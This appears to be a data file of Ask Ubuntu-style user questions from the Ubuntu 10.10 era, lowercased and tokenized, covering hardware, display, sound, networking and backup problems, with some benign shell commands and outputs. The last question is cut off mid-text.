12372	disappearing window borders after reboot	since the install of ubuntu desktop 10.10 , any launched programs shows up without a windowborder . i update daily , but the problem remains . until now i found only one `` remedy '' that fixes the problem ( until the next reboot ) . this `` remedy '' is not logical to me and is something i just stumbled upon . on the desktop i choose with a right mouseclick for the option 'change desktop background ' . when this window popsup i choose the last tab for 'visual effects ' . then i choose any of the options other then 'normal ' . the program starts looking for a driver , but fails to find any . at the moment the program reports this back to me ... . surprise ... ... all the windowborders are visible and stay that way until i reboot . i can not explain this , but i would like to find a real and permanent solution to this problem .
12373	i am looking for a touch screen laptop that works awesome with ubuntu ( it has to be a full laptop not netbook )	i am looking for a nicely priced touchscreen laptop ( not netbook ) that works great with ubuntu . can you help me out ? -thanks ! ! -
12375	sound does n't work with dsd	i just yesterday took the plunge into linux and ubuntu . i loaded up 10.10 on my computer and managed to `` make '' the programs i needed but find an issue with the ac97 sound card . all day and most of the night and day today i tried all the tips and nothing . it seems 10.10 is n't playing nicely with this program : ( the program is dsd1.4.1 found here : http : //wiki.radioreference.com/index.php/dsd - actually it is links to the two required files under download . the mbelib-1.2.3-src.tar needs to be worked first as dsd requires this to operate . i got it all done , did the `` make '' and when i try to run it i get the following : digital speech decoder 1.4.1 mbelib version 1.2.3 ioctl reset error ioctl speed error ioctl stereo error ioctl setfmt eror audio in/out device : /dev/audio i learned today from another user that the two prior versions of ubuntu work but that 10.10 does n't . as i said i tried all the tips on both sites but no luck . my internet connection is too slow to dl anything as large as this ( 17 hours ) so i am a bit stuck ! the other user also had the exact same issue using 10.10 , and the sound still works , just not using the program dsd ... . very odd . hoping someone here can figure out whats going and maybe a fix for it . i later found out it seems no sound cards are working properly but ca n't verify this one . it does only happen with version 10.10 though . thank you in advance ! john
12376	a simple script . a simple binding . so why is n't it simple ?	i 've used xbindkeys to associate a hot-key with /usr/bin/test.sh i can run the script two ways now ! ( well , not always ! hence this question . ) eg . /usr/bin/test.sh contains # ! /bin/sh gedit using terminal ... gedit launches using hot-key ... gedit launches however , when test.sh contains # ! /bin/sh nautilus using terminal ... nautilus launches using hot-key ... nautilus fails to execute ! my bash skills are basic , to say the least ... is there some bracket , or quotes thing i need here ? ... or is there something inately differnt between `` nautilus '' and `` gedit '' ... is it `` xbindkeys '' ? ... i 'm stuck : (
12383	how to go automatically from suspend into hibernate ?	is it possible to make ubuntu go into hibernate state from suspend , aka `` suspend sedation '' ? for example , my laptop is set up to go into a suspend once i close the lid . if then i do n't use it for entire day , the battery goes flat , because even in suspend mode the hardware still consumes a small amount of power , and the battery eventually discharges . what i want is to be able to tell ubuntu that even if it is suspended , it still needs to go into hibernate after some hours of inactivity . windows can do that . ubuntu can be programmed to go into standby or hibernate on timer , but not both . update : i guess i need to be more specific . what i am looking for is this : when i close the lid , the laptop is put into suspend . then , after a pre-determined time ( even if the battery is going strong ) if i still do n't use it , it should put itself into a hibernate to save battery power .
12385	10.10 upgrade screen resolution issue	about a week ago , i upgraded my dell optiplex gx520 from 10.04 lucid lynx to 10.10 . unfortunately , i excitedly ignored all the warnings about how it was a beta release and i 'm now stuck with a big problem : the screen resolution is way too small . right now , when going to system- > preferences- > monitors , i see 1024x768 listed as the current display setting , with the only higher setting being 1360x768 ( which is useless as it just squeezes the screen ) . before the upgrade , everything looked fine- i was able to view certain websites without a horizontal scroll bar , but after the upgrade , the entire interface looks oversized and i ca n't seem to find a way to change it . is there some way i can downgrade the os , or even my version of whatever package manages screen resolutions , so i can `` reset '' it to how it was working before the upgrade ? or is there any other fix that i can do ? edit running xrandr returns the following : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1360x768 59.8 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 59.9 this is basically what i saw in system- > preferences- > monitors ... except that it looks like with a maximum of res of 4096x4096 , i should be able to make it higher . thanks for any help in advance .
12388	how to use compiz with ubuntu 10.10 netbook edition ?	hello . i am using ubuntu 10.10 netbook edition with classic desktop interface ( no unity ) . for visual and usability purposes , i want to use compiz . i , however , afraid unity support will be broken when i install on my machine . what should i do ?
12393	how to `` mash together '' the contents of 2 hard drives ?	previous research suggests that i need an lvm . however , i ca n't find anything for what to do about data being on both drives . i took the hard drive of an existing , running 10.04 computer and put it into another existing , running , machine . i want to be able to access the files like they were on the local ( booting ) hard drive . for example , having the applications that were previously installed on the `` foreign '' drive accessible through the `` applications '' button . any suggestions ?
12394	getting back ubuntu 's default boot splash	i am a gnome user . just out of curiosity , i installed the package kubuntu-desktop to check out the latest kde . the package has hijacked and replaced the nice ubuntu boot splash with the blue kde one . how can i get the original boot splash back ? which package should i re-install ?
12397	how to get acpi health data on a gigabyte ga-890gpa-ud3h ?	i have a gigabyte ga-890gpa-ud3h motherboard and phenom ii x6 in my desktop computer , and it 's all working well , except that ubuntu 10.10 does n't seem to detect any acpi support at all : it ca n't suspend , and it ca n't measure its internal temperatures . i would have thought a new device like this ought to have pretty pervasive acpi support ?
12401	what is a good foxit reader equivalent ( or other pdf editor ) ?	on windows , i have found foxit reader to be quite handy when i need to highlight texts in pdf document , make annotations , etc . etc . unfortunately , i have not yet found product as user friendly ( which also does not corrupt pdf files ... ) and full-featured as foxit software ... any recommendations ? ** update ** i just tried the open office pdf import extension . it seems to work ok ... if anyone used it for a while , i 'd appreciate your feedback on that one . thanks ! ** update ** you ca n't highlight text with openoffice 's pdf extension . does n't matter , i was reading this thread and found out about xournal . as it turns out , it 's in the repository . it does not natively save in pdf , but once all edits are done , the document can be exported to pdf ( and overwrite the old one , just like gimp with the native .xce format and original png file , for example ) i realize that this question is no longer a question in itself , but could be migrated to community wiki . however , feedbacks are still welcome ! ** edit ** so ... to close up this question , i have to say that i adopted xournal . it is light and works pretty well , even on multi-page pdf documents . thank you all for your answers !
12402	how to fix samba read and write permissions for directories in an ext4 partition ?	i have two gnu/linux distors installed on my laptop : ubuntu and archlinux . i have symlinked some diectories from archlinux 's home directory to directories in the ubuntu home directoy . those symlinked directories have write and read access on ubuntu cli and gui . but they can not be browsed or opened if the ubuntu home directory is accessed as a samba share on windows machines . how can i make them writable for samba too ? this is the etry for archlinux partition on ubuntu fstab file . /dev/sda3 /media/arch ext4 relatime 0 2
12409	do you ever have to do any regular maintenance ?	for example , de-fragmenting , disc cleanup , or stuff like that ?
12414	why are indicator applets not working ?	the indicator applet and the indicator applet session are not showing anything for some reason . last time i was on ubuntu they were working fine . does anyone know why this might happen ? the last time i was on ubuntu , i had uninstalled unity , would that have anything to do with this ?
12418	upgrade from intrepid to lucid , using cdrom	i want to upgrade a pc from intrepd to lucid , but i can only go as far as 9.10 , even though i have `` show only lts '' enabled in sources . i have a 10.04 cd , is it possible to upgrade to lucid , after i pop it in and run some command ? thanks . edit : this is a development pc , and doesnt have /home partition . ( i know , not good practice ) . so , a re-install is the absolute last option .
12420	any idea how to use tail -f in squid to see logging and processing on localhost ?	squid is good one , also webmin . i am still new to this , can someone helping how to see the squid progress in terminal or in webmin ? i mean when we open some site its going also on squid and showing the logs that site have being hit , miss , or have in cache ? also any idea to using squid or webmin to block the ads , websites , or keywords ? thanks .
12426	what feature is at play when ctrl+shift+alt+u , e `` types '' an unprintable hex 000e ?	i tend to use ctrl+shift+alt for my customized system-wide keybindings . when i tried ctrl+shift+alt+u it printed an underscored u and waited for more keyboard input ! ... some keys were accepted and some were not ... eg . numbers were accepted and they too were underlined , but only a few keys allowed me to break out . i then tried ctrl+shift+alt+u immediately followed by ctrl+shift+alt+e . this produced an unprintable hex 000e ( ? ) and broke out of the loop ... the unprintable character got me thinking that this may be unicode related . if so , how so ? what is happening here ? is this underscored u a trigger for an input method editor ? this behaviour occurs : here ( as i type ) , `` gedit '' , text-edit fields ... ( but not in the terminal ) ... and `` gvim '' reported `` pattern not found '' ...
12430	headphone is not working	i am running ubuntu 10.10 on a lenovo ideapad z560 . the speakers run fine but the headphones are not recognized when i plug them in . audio comes out of the speakers only . i tried all alsa and pulseaudio settings but to no avail . i came to know that this is a known bug and many people are having this problem . i was wondering whether shifting to oss4 would help . i need some advice because once i make the switch i would need to reconfigure a large number of audio apps . thanks in advance
12433	install netbook remix on maverick meerkat	hi all , i 've recently decided to give my old ibook g4 a new life . as a consequence , after some search , i found ubuntu maverick meerkat for powerpc iso and installed it . it was fine ( although some steps - like correctly configuring network and airport extreme - were not that easy , but it 's a different story ) . so , i 've now a working maverick meerkat on my ibook . besides , i 've recently discovered ubuntu netbook remix , and i consider it would be a very cool addition to my ibook and its limited display ( 1024x768 ... yes , it 's that old ) . but from what i can see , it seems that unr iso is only available for x86 platforms ( but i may be wrong , in which case i hope you 'll correct me ) . so is it a way to install it over a `` traditionnal '' ubuntu desktop install ? and if so , will it work on powerpc architecture ? thanks edit ( i let the question open , as it seems to me as a related issue ) . so , i installed it , and the computer did not complains about it . unfortunatly , when trying to log in using unr as desktop ( selection done on login screen , when entering the password ) , i only get a screen telling me to insert the cd ( which of course i have not ) , after what session does not opens , and i go back to login screen . what is the solution to that problem ?
12434	vulnerability scanner , nmap vs nessus	i need a good vulnerability auditing tool for ubuntu so i decided to try nmap i also recalled that there was a product that can do this kind of work called nessus it is no longer available in the repository and the packages for ubuntu at its site http : //nessus.org/nessus/ are old , i suppose that the latest one may work on maverick though , does anyone have any experience using nessus ? how does it compare to nmap ?
12435	how do i restore two finger middle click again ?	it used to be that tapping two fingers on the touchpad send a middle mouse click . now it does a right click and three fingers now are the middle click . i really ca n't understand the change and think it is a bug or badly copied from apple or something . the reasoning escapes me totally . i use middle click to open links in a new tab in the browser all day and i rarely use right click ( and i have a right mouse button below the touchpad , doh ) tapping three fingers on my tiny eeepc touchpad is next to impossible so i want the old behavior . i found : synclient tapbuttons2=2 synclient tapbuttons3=3 but that did not work on 10.10 does anyone know how to restore sane behavior ?
12437	how to echo output of a top into a text file ?	i want to write batch or something , that will write output of top into a file on login . i did top > > output-file but it contains some strange character ! can somebody give a simple tutorial about how to write batch file in linux ? thanks !
12440	virtual network and nat set-up	i need some help . i 'm completely new to linux . i 'm trying to set up the following scenario : + -- -- -+eth0 + -- -- -+ + -- -+ | vm2 | -- -- -- -- -- -| vm1 | -- -- -- -- -- -- -- -| h | + -- -- -+ eth1 + -- -- -+eth0 ( nat ) + -- -+ vm2 - virtual machine from virtual box , using ubuntu vm1 - virtual machine from virtual box , using ubuntu : i want this to act as a nat . h - host , my windows vista the dots were just added since after saving the spaces disappear . so if i ping h from vm2 , h would receive a different ip address from vm2 . could you give me a step by step on this ? all machines are of course 32 bit . thanks . would appreciate the help so much .
12442	command line smtp client such as cleancode 's email	i 'm looking for a command line like cleancode 's email program which would allow me to send emails from the command line without setting an mta ( and would allow me to use separate accounts for each users , without touching the mta 's configuration ) . is there a ppa with cleancode 's email program ? is there other similar program which is packaged with ubuntu ?
12446	subversion stops working on http : // checkouts	i 've upgraded from 10.04 to 10.10 and subversion checkout from http : // just refuses to work anymore . always timeouts . i tried a 10.10 live version and that works and all my packages are upto date . the symptom is : hendry @ x201 tmp $ svn co http : //tc.labs.opera.com/svn/apis/xmlhttprequest/ svn : options of 'http : //tc.labs.opera.com/svn/apis/xmlhttprequest ' : could not connect to server ( http : //tc.labs.opera.com ) i am out of ideas since subversion is too difficult to debug . do i just re-install everything ? anyone seen a similar problem ? svn , version 1.6.12 ( r955767 ) i strongly suspect it has some thing to do with the neon library . ii libneon27 0.29.3-2 an http and webdav client library ii libneon27-gnutls 0.29.3-2 an http and webdav client library ( gnutls enabled )
12449	what i can use to highlight pdf ?	is there a software like mac 's default viewer , that allows you to annotate and highlight pdf documents ? thanks in advance , marco
12453	whitespaces error while coping files	my needs is to copy all files and folders of a `` master '' folder into all the usb keys mounted . so , i wrote this code : for usb_key in `ls /media/` ; do for file in `ls -a /home/daniele/usb/master` ; do cp /home/daniele/usb/master/ '' $ file '' /media/ $ usb_key/ '' $ file '' done ; done ; for usb_key in `ls /media` ; do umount /media/ $ usb_key done ; # alert me that the work is done totem /home/daniele/usb/0016.mp3 & exit but , if i have a folder named `` do not delete '' into /home/daniele/usb/master , this throw an error becose of the filenames . so , how can i do solve that ? there is a way to replace all the whitespaces in the $ file var with \ ?
12457	'on-screen keyboard ' error after upgrading from 9.04 to 9.10	i recently upgraded ubuntu from 9.04 to 9.10. well some of the keys of my keyboard do n't work properly so i always hit up terminal an use on screen keyboard 'onboard' but when i have upgraded ubuntu and when i launch 'onboard ' it shows me following error : warning : config : ca n't load default loading default layout instead then the on screen keyboard gets launched . but when i minimize it , it automatically crashes .
12462	is it possible to minimise applications using the unity bar ?	i quite unity but it seems like odd behaviour that clicking on the icon `` focusses '' the application instead of minimising it when it 's already focussed .
12463	64bits desktop does not boot	my 64bits desktop ( intel core i7 ) was able to boot with windows xp 64 installed , but it 's not more possible after installing ubuntu amd64 : the computer says the hd is not bootable . the only way of booting the computer now , is using the live cd and choosing boot from the hard disk . besides , if i put this hd in a 32bits computer , grub boots normally . how can i enable boot directly from the hd using the 64bits desktop ?
12464	how to get a windows client to authenticate against a linux ldap server	how can we set windows clients to authenticate against an ldap server running on ubuntu ?
12470	using tar and rsync for high availability	i have ubuntu cloud servers running which i do n't have direct access to but with ssh . i 'm using 'tar ' to clone or to have high availability of this server . i followed the tutorial from the link [ link text ] [ 1 ] . i tried this installing a new server of same version . when i extracted the tar ( tar -xvpzf ~/clone.tgz -c / ) on the destination ( new ) , at the end it 's ending with the following output similar to the below ( do n't know if it 's error ) . tar : var/run : time stamp 2010-11-09 17:09:11 is 7335.159880406 s in the future tar : var/spool/postfix/usr/lib/zoneinfo : time stamp 2010-11-09 17:08:26 is 7290.159730037 s in the future tar : var/lib : time stamp 2010-11-09 17:27:51 is 8455.159349527 s in the future tar : usr/bin : time stamp 2010-11-09 17:28:02 is 8466.159254097 s in the future tar : usr/share/sgml : time stamp 2010-11-09 17:27:47 is 8451.158909506 s in the future tar : usr/share/man/man7 : time stamp 2010-11-09 17:27:50 is 8454.158393583 s in the future tar : usr/share/man/man1 : time stamp 2010-11-09 17:28:02 is 8466.158166556 s in the future tar : usr/share/man/man8 : time stamp 2010-11-09 17:27:51 is 8455.158057701 s in the future tar : usr/share/omf/time-admin : time stamp 2010-11-09 17:27:52 is 8456.157830449 s in the future -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - i 'm using following command to create a tar file of the specified directories on the source system . tar -cvzf ~/clone.tgz -- exclude ~/clone.tgz -- exclude /etc/hosts -- exclude /etc/hostname -- exclude /etc/udev/ -- exclude /etc/network/interfaces -- exclude /etc/resolv.conf /etc /home /opt /tmp /usr /var /mnt is there any precautions before using tar ? ( the tar is one time creation from then i 'll be using rsync ) should i 've to include any more directory like bin or lib ? - suggest me should i 've to exclude any directory ? like i had a network device ( eth0 ) problem ( failed to start up eth0 ) . so in the above command i 've excluded `` /etc/udev/ '' and after this i felt this was fine . like this , is there any thing i 've to exclude from /etc/ or from any directory that i 've included ? - suggest me . how could i schedule rsync ( incremental bkp ) with ssh combination to sync the directories ( specified in tar ) to the remote location ( say /mnt/newdir ) which i could tar and extract it later in case of system failure . rsync can be scheduled to run as root user but the ssh will prompt for the password . fyi , sudo is completely disabled and as well as direct ssh login to root is also disabled . if there is any better way without any harm to server to achieve this , can suggest . [ 1 ] : http : //ubuntuforums.org/showthread.php ? t=525660
12473	file and directory comparison tool ?	i 'm looking for something that will compare directories and files like beyond compare does for windows . its mainly for use of source control , but i need to use it for deployment as well .
12483	blank screen when booting after editing the startup settings	i used startup manager to edit startup settings and when i restarted , i got a black screen and could n't log on . please help .
12486	where can i find mozilla nspr package ?	i tried to find mozilla nspr through synaptic without luck . does anyone know what is it package name ?
12493	how can i find the version of ubuntu that is installed ?	i installed some version of ubuntu on my vmware , but i do n't know what version exactly it is . how can i find it out ?
12498	/gc is not picking up mississippi in my list - what is the problem here ?	# ! /usr/bin/perl # match5.pl open ( infile , '' test2.txt '' ) || die `` $ ! `` ; print `` enter the pattern you wish to match : `` ; chomp ( my $ pat= < stdin > ) ; my $ num_letters=0 ; while ( < infile > ) { if ( / $ pat/ ) { $ pat=~/\w/gc ; $ num_letters++ ; print `` $ _ contains the pattern $ pat and teh number of $ pat is $ num_letters\n '' ; } } print `` number of $ pat is $ num_letters\n '' ; close ( infile ) ;
12502	how do i get the apple wireless keyboard working in 10.10 ?	so i 've gone and bought a magic mouse and apple wireless non-numeric keyboard . the magic mouse worked out-of-the-box almost perfectly , except for the forward/back gesture which still is n't functioning , whereas the keyboard did n't . it has constant trouble with the bluetooth connection . only the 7 , 8 and 9 buttons and volume media keys correspond correctly with the output . pressing every single key on keyboard has this output : 789/=456*123-0.+ when i use blueman the keyboard can be setup and shows up in `` devices '' but i get a warning when i click `` setup '' ; `` device added successfully , but failed to connect '' ( although removing the keyboard and setting it up as a new device does n't incur this error ) . using gnome-bluetooth i have encountered no error messages but it connects properly less often than blueman and i can still only type the aforementioned output . what am i not doing ? where is this going wrong ? edit : i have read this http : //ubuntuforums.org/showthread.php ? t=224673 inside out several times to no avail . it seems these commands do n't work for me with the apple peripherals sudo hidd -- search hcitool scan fortunately i have the luxury of a 1tb hard drive , near limitless patience and no job . i have installed a fresh ubuntu 10.10 64bit ( albeit smaller than mine ) and after updating and restarting for the first time , i set up my devices in exactly the same way as i have learnt on my original install i succeeded once again with the mouse and , to my joy , with the keyboard also . though i could not seem to find alt+f2 and had to reconfigure that and several other keyboard shortcuts , the keyboard is working and in a spectacular fashion . still , this leaves me with the issue of my original install . i returned to it with some new found knowledge but failed again . perhaps i have a missing dependancy ? i did uninstall bluetooth after the initial set up and reinstalled it recently for the pupose of these peripherals . maybe it 's because i 'm running 64bit ? this is still not solved , but easily avoided by not changing too much from the original install . just hide stuff or turn it off , do n't uninstall too much .
12503	synchronize blackberry address book and calendar with evolution directly	are there any applications available that can be used to safely synchronize a blackberry smart phone directly with evolution ? i use some tools made available by barry-util from the repository , i am able to charge my blackberry curve 8300 via usb , i can also backup the address book and calendar to computer disk , however , i would like to know if there are any tools available to synchronise these types of phones directly with evolution , i heard about a library called opensync and i am guessing that it can be used with barry to accomplish what i want . i am presently synchronizing my phone with google , see this : http : //www.google.com/mobile/sync/ i then export data from my google web applications to use in evolution , this is not as smooth as i would like .
12504	apt-get build-dep problems	this often happens to me . i go to install a program and it says i am missing certain dependencies . then i run apt-get build-dep and get an error message like the following : sudo apt-get build-dep gnome-shell reading package lists ... done building dependency tree reading state information ... done the following packages have unmet dependencies : libgjs-dev : depends : xulrunner-dev ( < 1.9.2.4~ ) but 1.9.2.10+build1+nobinonly-0ubuntu0.10.04.1 is to be installed librsvg2-dev : depends : librsvg2-2 ( = 2.26.2-0ubuntu1 ) but 2.26.3-0ubuntu1 is to be installed e : build-dependencies for gnome-shell could not be satisfied . what should i do to fix this problem when i thought this was exactly the kind of problem build-dep was designed to fix . thanks .
12512	nautilus freezes every time i try to delete a file from my mounted disc	my problem is the following : every time i try to delete a file from my auto-mounted drive nautilus freezes up . first i get the prompt-screen saying ‘ can not move file to trash , do you want to delete immediately ? ’ . no matter what option i choose , nautilus will freeze and stay frozen until i force it to quit . i have no problem deleting files from my ‘system’ disk . and i tried deleting files on my mounted disk by using cli and from nautilus on an other computer over ssh , both methods work fine . it 's just deleting that gives me problems . copying , moving files around will work as it should .
12516	where can i get the latest ubuntu alpha or beta ?	i 'd love to test the latest ubuntu alpha/beta ( otherwise known as `` ubuntu+1 '' ) , but i ca n't find it . where can i find download for the pre-releases of ubuntu ?
12523	how calibrate quanta touchscreen ?	greetings ! i was able to make my quanta touchscreen ( built into a gateway zx4800 ) using these instructions but it badly needs to be calibrated . i 'd like to use this calibrator but i am a newbie , and the instructions there are very linux . could someone tell me the command prompt commands i need to install that xinput_calibrator program in ubuntu 10.04 ? thank you ! !
12525	snippits : error while trying to run ks do	i 'd quite like to use snippits , but after i carefully followed these directions : http : //lifehacker.com/351285/automate-repetitive-typing-with-snippits i tried using the keyboard shortcut i 'd assigned to snippits and got the error : '' error while trying to run ( ks do ) '' i 've looked around , and it seems to be a common problem , but i have n't had any luck finding an answer . any ideas would be much appreciated .
12529	how can i make my mac mini start headless ?	my mac mini does n't boot without a monitor connected to it . as i 've read in various forums on the internet , mac os x lets the mac mini boot without an attached monitor if ssh is turned on . obviously , there 's a setting in the efi somewhere . is it possible to apply this setting in linux as well ?
12531	maverick not recognizing my sound card	i 've installed maverick on a sony vaio vpcea24fm . i have no sound . i 've gone through the guide at https : //help.ubuntu.com/community/soundtroubleshooting up to the section titled , `` is the system recognizing your sound card ? '' when i run the terminal command in that step : sudo aplay -l i get the following response : aplay : device_list:235 : no soundcards found ... the machine does actually have an onboard soundcard ; it works fine when i run windows . when i run hardware lister ( lshw-gtk ) , this is what shows up for audio : can anyone help me out ? i really want to switch over to linux completely , but i ca n't do it if i do n't have working sound .
12532	dns look ups slow with mts blaze	i am trying to use mts mblaze on ubuntu 10.10 . i am getting downloading speed of more than 100kb/sec but browsing is too slow as its taking too much time for dns look up . google.com is working perfectly fine , but when i am trying to click on any search result i am getting same issue , too slow.. any solution ?
12535	why does n't my acr38 smartcard reader work ?	i 've this smartcard reader : bus 002 device 004 : id 072f:90cc advanced card systems , ltd acr38 smartcard reader i 've installed the following packages : pcscd , libacr38u , pcsc-tools , and a driver available on this website http : //www.bit4id.com/italiano/download/download_file/linux.zip the pcscd daemon seems running : andrea @ centurion : ~ $ ps -e | grep pcsc 2799 ? 00:00:00 pcscd when i try to test if the smart card is working , i get no reply : andrea @ centurion : ~ $ pcsc_scan pc/sc device scanner v 1.4.16 ( c ) 2001-2009 , ludovic rousseau < ludovic.rousseau @ free.fr > compiled with pc/sc lite version : 1.5.3 scanning present readers ... waiting for the first reader ... how can i fix this ?
12539	manually setting xorg options from command-line ?	quick question : how do you set xorg options with a command ? for example , i have an xorg entry as follows : section `` inputclass '' identifier `` marble mouse '' matchproduct `` logitech usb trackball '' ... option `` vertscrolldelta '' `` 4 '' endsection and i 'd like to change the value of `` vertscrolldelta '' without restarting my computer . do you know any command-line interface to it ? i 've looked into xinput , but the properties of which does not necessary correspond to xorg options .
12542	cross platform terminal/scp app	i am doing more network device management at work , ( mainly cisco and juniper ) and need tools to telnet/ssh and scp to manage the devices . i am comfortable with the gnome terminal , but would n't mind having a tool that makes it easy to `` bookmark '' hosts , and even drag and drop scp copying would be helpful . i use putty at the moment in windows , ( and winscp for copying files ) but was wondering if there was a better , or more integrated cross platform tool . ( work machines have windows 7 )
12543	use gnome custom themes appearance in kde ?	is there a way to get the colors of a gnome custom theme to kde without matching every single setting manually ? ( theres tons of different color settings in the kde color schemes , most of which i even do n't know where they are applied ... i use kde with compiz to run emerald as windows decorator . because i really like the `` elementary '' -theme . because my eyes are n't that great i had to tweak the gtk-elementary theme for some additional contrast . i saved it as `` elementary-piedro '' . now i want to choose this theme in kde-systemsettings/appearance/gtk-applications but it doesnt't show the tweaked version ? where is it saved by the normal `` gnome appearance preferences '' -utility ? is there a way to use the tweaked settings for kde-applications ?
12545	port forwarding to connect to mysql database of virtualbox	i have ubuntu 10.04 as host machine and ubuntu 10.10 as guest machine installed in virtualbox . i had success on port forwarding to connect to apache of guest machine , so that now i can open in host machine web sites published in web server ( apache ) of guest machine . i need to do the same with mysql , i.e . access mysql of guest machine from host machine . in order to achieve this goal i am executing following commands in host machine : vboxmanage setextradata ubuntu `` vboxinternal/devices/e1000/0/lun # 0/config/mysql/hostport '' 3307 vboxmanage setextradata ubuntu `` vboxinternal/devices/e1000/0/lun # 0/config/mysql/guestport '' 3306 vboxmanage setextradata ubuntu `` vboxinternal/devices/e1000/0/lun # 0/config/mysql/protocol '' tcp where ubuntu is the name of the host machine . guest machine loads and when i try to connect to mysql from host machine it can not connect to it . what could be the problem here ? thank you .
12546	how to watch mounted dvd image in vlc ?	why vlc ( in my case ver . 1.1.4 ) can not open/play mounted video dvd images /in ubuntu 10.10 as well ?
12558	usb blocks suspend on a gigabyte ga-890gpa-ud3h with ati sb700/sb800	following on from question 12397 , i 'd still like to get suspend working on my phenom ii x6 / ga-890gpa desktop machine running current maverick . when i run pmi action suspend the machine does n't crash , but it also does n't suspend . the kernel logs show : pm : syncing filesystems ... done . pm : preparing system for mem sleep freezing user space processes ... ( elapsed 0.02 seconds ) done . freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . pm : entering mem sleep suspending console ( s ) ( use no_console_suspend to debug ) pm_op ( ) : usb_dev_suspend+0x0/0x20 returns -2 pm : device usb8 failed to suspend async : error -2 pm : some devices failed to suspend pm : resume of devices complete after 0.430 msecs pm : resume devices took 0.000 seconds pm : finishing wakeup . restarting tasks ... done . pm : syncing filesystems ... i 've tried disconnecting all the usb devices , and then connecting in to run pmi over ssh , and i get the same failure . with everything unplugged , i see the following usb devices : bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub and lspci shows the physical devices are : 00:12.0 usb controller : ati technologies inc sb700/sb800 usb ohci0 controller 00:12.2 usb controller : ati technologies inc sb700/sb800 usb ehci controller 00:13.0 usb controller : ati technologies inc sb700/sb800 usb ohci0 controller 00:13.2 usb controller : ati technologies inc sb700/sb800 usb ehci controller 00:14.5 usb controller : ati technologies inc sb700/sb800 usb ohci2 controller 00:16.0 usb controller : ati technologies inc sb700/sb800 usb ohci0 controller 00:16.2 usb controller : ati technologies inc sb700/sb800 usb ehci controller 02:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) booting with no_console_suspend makes no difference .
12560	schema org.gnome.empathy not installed	having recently installed ubuntu on my ibook g4 ( yup , power pc style ) , i click on all available buttons to see what happens ( as ubuntu is full of nice buttons , really ) . strangely , when clicking the mail button on menu bar , nothing happens . after having found it in fact starts empathy , i launched it from terminal , and got the following : glib-gio-error ** : settings schema 'org.gnome.empathy ' is not installed aborting ... aborted what can i do to fix that and make empathy work correctly ?
12562	how to check if ubuntu desktop or server is installed ?	i have a shared hosting . i have access to shell . os is ubuntu , and i want to check if it is server version or desktop version . when i login through shell , it shows following information : linux [ server-name ] 2.6.32-24-generic # 39-ubuntu smp wed jul 28 06:07:29 utc 2010 i686 gnu/linux ubuntu 10.04.1 lts
12573	high resolution and java apps	i 'm using ubuntu 9.10 with an ati radeon x1300 pro , resolution 1600x1050 . the problem is about slow speed when i use java apps . for instance , netbeans is unusable cause of lack of speed . with others app ( non java ) the problem does n't appear . so my question is if this can be a java problem or a video card ( + driver ) problem ?
12576	how to create an encrypted partition ?	well i 'm trying to create an encrypted partition and while i formated it i got the option to choose the partition type ( fat/ext2/ext3/ext4/xfs/reiserfs/minix/ntfs ) is there any benefit of choosing one of them over the other if i want my driver to be very encrypted ? and one other thing if cold please recommend me an encryption app for now i 'm thinking about truecrypt . thx .
12578	adjusting display geometry in a virtual machine ?	running 11.04 beta in a parallels 5.0 virtual machine , but this question will apply to any virtualization software . parallels 5 linux tools ( guest additions ) do n't work for 10.10 and 11.04 and i do n't want them . i like how the vm is integrated as is . the only thing that needs tuning is the screen geometry . none of the options in the systems - > preferences - > monitors fit my display perfectly . i need it at 1080 x 1920 ( 9:16 ) or 1920 x 1080 ( 16:9 ) . many different resolutions work ( see screen-shot bellow ) , among which are : 1680 x 1080 ( too narrow horizontally and a bit too short vertically ) 1920 x 1200 ( perfect horizontally , but a bit too tall vertically ) how can i adjust the screen resolution ( display/monitor size ) manually ? what i tried so far $ cvt 1920 1080 # 1920x1080 59.96 hz ( cvt 2.07m9 ) hsync : 67.16 khz ; pclk : 173.00 mhz modeline `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync $ sudo xrandr -- newmode `` 1920x1080 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync xrandr : failed to get size of gamma for output default $ cvt 1080 1920 # 1080x1920 59.96 hz ( cvt ) hsync : 119.26 khz ; pclk : 176.50 mhz modeline `` 1080x1920_60.00 '' 176.50 1080 1168 1280 1480 1920 1923 1933 1989 -hsync +vsync $ sudo xrandr -- newmode `` 1080x1920 '' 176.50 1080 1168 1280 1480 1920 1923 1933 1989 -hsync +vsync $ sudo xrandr -q xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1920 x 1200 , maximum 1920 x 1200 default connected 1920x1200+0+0 0mm x 0mm 1920x1200 0.0* 1600x1200 0.0 1680x1050 0.0 1400x1050 0.0 1280x1024 0.0 1440x900 0.0 1280x960 0.0 1280x800 0.0 1024x768 0.0 800x600 0.0 640x480 0.0 1920x1080 ( 0x11d ) 173.0mhz h : width 1920 start 2048 end 2248 total 2576 skew 0 clock 67.2khz v : height 1080 start 1083 end 1088 total 1120 clock 60.0hz 1080x1920 ( 0x11e ) 176.5mhz h : width 1080 start 1168 end 1280 total 1480 skew 0 clock 119.3khz v : height 1920 start 1923 end 1933 total 1989 clock 60.0hz the 2 new resolutions do not show up in the monitor preferences gui : trying takkat 's solution here is what i do and get : $ gtf 1920 1080 60 -x # 1920x1080 @ 60.00 hz ( gtf ) hsync : 67.08 khz ; pclk : 172.80 mhz modeline `` 1920x1080_60.00 '' 172.80 1920 2040 2248 2576 1080 1081 